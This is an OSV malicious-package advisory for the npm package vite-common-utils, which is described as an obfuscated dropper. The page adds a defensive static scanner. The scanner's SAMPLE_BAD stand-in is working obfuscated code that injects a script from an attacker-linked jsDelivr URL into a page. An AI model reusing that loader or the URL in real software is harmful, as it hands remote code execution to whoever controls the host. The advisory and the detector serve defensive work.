MAL-2026-6088

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-common-utils/MAL-2026-6088.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6088
Published
2026-06-17T22:33:52Z
Modified
2026-06-17T22:46:51.950397306Z
Summary
Malicious code in vite-common-utils (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b1d3397d754ffeb3726496769b2f159ce8596b2233b5875afa8f7fbca29ed0fd)

The package presents itself as a Vite utility library but its only export, loadFilbetScriptSilently, creates a <script> element whose src is hardcoded to https://cdn.jsdelivr.net/gh/gongben2024/network-security@main/src/filbet.js and appends it to document.documentElement, causing the consuming application to fetch and execute whatever JavaScript that URL currently serves. The URL is unpinned (mutable @main branch), is hosted under a personal GitHub user account unrelated to the package publisher, and has no integrity/SRI check. The shipped dist/index.js is the only file in the package and is heavily mangled with obfuscator.io (string-array decoder, hex identifiers, rotation loop), and package.json's devDependencies include gulp-javascript-obfuscator — confirming the obfuscation is intentional and hides the injector. The export name suffixed 'Silently', the cover-story package name, the obfuscation, and the off-publisher mutable code source jointly indicate a remote-code-execution dropper aimed at the downstream web application's origin and its users.
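The traits listed above (a script element pointed at an unpinned jsDelivr GitHub URL with no integrity attribute, obfuscator.io hex identifiers and a string-array rotation loop, an obfuscator in devDependencies, a single prebuilt dist file) are all cheap to check statically. The scanner below is an added example written for this page, not code from the advisory, from Amazon Inspector or from the package. SAMPLE_BAD is a constructed stand-in that mimics the described loader and manifest (the devDependency version and the exact code are invented); SAMPLE_OK is a constructed contrast that uses the same injection pattern but pins to a commit SHA and carries a placeholder SRI digest. Neither is the real dist/index.js.

```javascript
// Added example (not the advisory's or the package's code): static scan for the
// traits the advisory attributes to vite-common-utils' dist/index.js.
'use strict';

// jsDelivr GitHub URLs: gh/<user>/<repo>[@<ref>]. Only a 40-hex commit SHA is
// immutable; no ref means the default branch, @main is a branch, tags can be moved.
const JSDELIVR_GH = /https?:\/\/cdn\.jsdelivr\.net\/gh\/([\w.-]+)\/([\w.-]+)(?:@([^/\s'"]+))?/g;
const COMMIT_SHA = /^[0-9a-f]{40}$/;
// obfuscator.io fingerprints: hex identifiers and the arr['push'](arr['shift']())
// loop that rotates the string array at load time.
const HEX_IDENT = /\b_0x[0-9a-f]{4,}\b/g;
const ROTATION_LOOP = /\['push'\]\(\s*_0x[0-9a-f]+\['shift'\]\(\)\s*\)/;

function classifyRef(ref) {
  if (!ref) return 'mutable (no ref, resolves to the default branch)';
  if (COMMIT_SHA.test(ref)) return 'pinned (commit SHA)';
  if (/^v?\d+\.\d+\.\d+/.test(ref)) return `tag ${ref} (movable by the repo owner)`;
  return `mutable (branch ${ref})`;
}

// Scan one JS file. The literal-token rules fire on plain code and on
// string-array style obfuscation; if the obfuscator's string encoding option
// (base64/RC4) were on, only the obfuscation rule would still fire, which is
// why it is scored separately rather than folded into the URL rule.
function scanSource(path, text) {
  const findings = [];
  if (/createElement/.test(text) && /['"]script['"]/.test(text)) {
    const attaches = /['"](documentElement|head|body)['"]/.test(text) || /document\.(documentElement|head|body)\./.test(text);
    findings.push({ path, rule: 'dynamic-script-element', severity: 'info',
      detail: attaches ? 'script element created and attached to the document' : 'script element created' });
  }
  const hasIntegrity = /integrity/.test(text);
  for (const m of text.matchAll(JSDELIVR_GH)) {
    const cls = classifyRef(m[3]);
    if (!cls.startsWith('pinned')) {
      findings.push({ path, rule: 'mutable-remote-script', severity: 'high',
        detail: `${m[0]} is ${cls}${hasIntegrity ? '' : '; no integrity attribute anywhere in the file'}` });
    }
  }
  const hexCount = (text.match(HEX_IDENT) || []).length;
  const perKb = hexCount / Math.max(1, text.length / 1024);
  const rotates = ROTATION_LOOP.test(text);
  if (perKb > 5 || rotates) {
    findings.push({ path, rule: 'obfuscator-io-markers', severity: 'high',
      detail: `${hexCount} _0x identifiers (${perKb.toFixed(1)} per KB)${rotates ? ', string-array rotation loop' : ''}` });
  }
  return findings;
}

function scanManifest(pkg) {
  const obf = Object.keys(pkg.devDependencies || {}).filter((d) => /obfuscator/i.test(d));
  return obf.length
    ? [{ path: 'package.json', rule: 'obfuscator-devdependency', severity: 'medium', detail: obf.join(', ') }]
    : [];
}

// files: { relativePath: fileText } for every file in the unpacked tarball.
function scanPackage({ manifest, files }) {
  const findings = scanManifest(manifest);
  const names = Object.keys(files);
  if (names.length === 1 && /^dist\//.test(names[0])) {
    findings.push({ path: names[0], rule: 'single-prebuilt-file', severity: 'medium',
      detail: 'only a built artifact is shipped; nothing to diff against source' });
  }
  for (const [p, t] of Object.entries(files)) findings.push(...scanSource(p, t));
  return findings;
}

// Constructed stand-in for the described loader (NOT the real dist/index.js).
const SAMPLE_BAD = {
  manifest: { name: 'vite-common-utils', version: '1.0.5', main: 'dist/index.js',
    devDependencies: { 'gulp-javascript-obfuscator': '^1.0.0' } }, // version invented
  files: {
    'dist/index.js':
      "var _0x4f2a=['createElement','script','https://cdn.jsdelivr.net/gh/gongben2024/network-security@main/src/filbet.js','documentElement','appendChild','src'];" +
      "(function(_0x1c3b,_0x2d4e){var _0x3e5f=function(_0x4f60){while(--_0x4f60){_0x1c3b['push'](_0x1c3b['shift']());}};_0x3e5f(++_0x2d4e);}(_0x4f2a,0x1a3));" +
      "var _0x5a6b=function(_0x6b7c){return _0x4f2a[_0x6b7c];};" +
      "exports['loadFilbetScriptSilently']=function(){var _0x7c8d=document[_0x5a6b(0x0)](_0x5a6b(0x1));_0x7c8d[_0x5a6b(0x5)]=_0x5a6b(0x2);document[_0x5a6b(0x3)][_0x5a6b(0x4)](_0x7c8d);};",
  },
};

// Constructed contrast: same pattern, pinned to a commit SHA and carrying an
// SRI attribute (the digest is a placeholder, not a real hash of anything).
const SAMPLE_OK = {
  manifest: { name: 'example-chart-loader', version: '2.0.0', main: 'src/index.js', devDependencies: { eslint: '^9.0.0' } },
  files: {
    'src/index.js': [
      'export function loadChart() {',
      "  const s = document.createElement('script');",
      "  s.src = 'https://cdn.jsdelivr.net/gh/example-org/chart@0123456789abcdef0123456789abcdef01234567/dist/chart.min.js';",
      "  s.integrity = 'sha384-" + '0'.repeat(64) + "';",
      "  s.crossOrigin = 'anonymous';",
      '  document.head.appendChild(s);',
      '}',
    ].join('\n'),
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanPackage(SAMPLE_BAD)) console.log(`[${f.severity}] ${f.rule} ${f.path}: ${f.detail}`);
}
```

Run against a real tarball, `files` would be populated from `npm pack` output or from the npm cache; the rules are heuristics, so a hit on the high-severity rules is a reason to read the file, not a verdict by itself, and a clean result says nothing if the strings were encoded.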

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "1cee011bd6bf55f3c74e2e42c15a9df8f1f7974308da228087ba019c3e5cd831",
            "import_time": "2026-06-17T22:38:22.614222187Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-17T22:33:58Z",
            "versions": [
                "1.0.5"
            ],
            "id": "IN-MAL-2026-006958"
        },
        {
            "id": "IN-MAL-2026-006956",
            "import_time": "2026-06-17T22:38:22.387689707Z",
            "sha256": "b1d3397d754ffeb3726496769b2f159ce8596b2233b5875afa8f7fbca29ed0fd",
            "modified_time": "2026-06-17T22:33:52Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.4"
            ]
        },
        {
            "id": "IN-MAL-2026-006957",
            "versions": [
                "1.0.3"
            ],
            "import_time": "2026-06-17T22:38:22.509457726Z",
            "modified_time": "2026-06-17T22:33:53Z",
            "sha256": "c989aa0727b9dd8a6ee9cc42b851dcea293df2ea4129284d43b4476461d91bcb",
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / vite-common-utils

Package

Affected ranges

Affected versions

1.*
1.0.3
1.0.4
1.0.5

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "vite-common-utils-1.0.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-lEZIrcfysLQ4EKuiQzhUnJ5qFZb49pe6maCNWW3yqCSYWZ5StX5fGEITNqYq1I88ylnUcsgFIAH9IwXYJbeaxQ==",
                "sha1": "0375e5987c718eaca90a7297d0a3e2561014da32"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "f0ab475fbfa816f3a76bd4c314c16999ab9f8d349147605b4b083f7b29fe6a29",
            "tlsh": "18313a952d40ad9063964fbe7677f1d8c266dc7e28d508c9e0a979c87d20a30f4e2774",
            "path": "dist/index.js"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-common-utils/MAL-2026-6088.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]